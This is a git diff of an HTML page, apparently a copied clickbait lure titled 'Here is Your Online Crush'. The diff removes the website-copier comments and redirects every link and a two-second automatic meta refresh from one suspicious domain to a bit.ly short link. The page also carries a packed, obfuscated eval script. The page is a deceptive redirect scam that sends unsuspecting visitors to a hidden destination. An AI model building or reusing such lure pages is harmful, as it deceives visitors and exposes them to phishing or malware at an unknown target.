--- a/index.html
+++ b/index.html
@@ -1,8 +1,7 @@
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
 <html>
  
-<!-- Mirrored from love254.ml/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 17 Oct 2017 08:53:06 GMT -->
-<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
+
 <head>
 
   <title> Here is Your Online Crush </title>
@@ -65,15 +64,15 @@ eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/
 </script>
 <script>
 /*setTimeout(function () {
-window.location.href = "http://sharks1.pw/dolop.php";
+window.location.href = "http://bit.ly/2x28IlG";
 },100000000000000000000000000000000000000);
 </script>
  <div class="preview">
                   <h2 align="center">Here is Your Online Crush </h2>
                    <center><img align="middle" width="200" height="auto"src="3.png" alt="3.png" title="3.png" /> </center>
  </div>
-                 <center> <a href="http://sharks1.pw/dolop.php">CLICK HERE TO </a> </center>
-                 <center> <a href="http://sharks1.pw/dolop.php">SEE HOW YOU GOT THIS CRUSH </a> </center>
+                 <center> <a href="http://bit.ly/2x28IlG">CLICK HERE TO </a> </center>
+                 <center> <a href="http://bit.ly/2x28IlG">SEE HOW YOU GOT THIS CRUSH </a> </center>
 
-<meta http-equiv="refresh" content="2;url=http://sharks1.pw/dolop.php">
+<meta http-equiv="refresh" content="2;url=http://bit.ly/2x28IlG">
 </body>
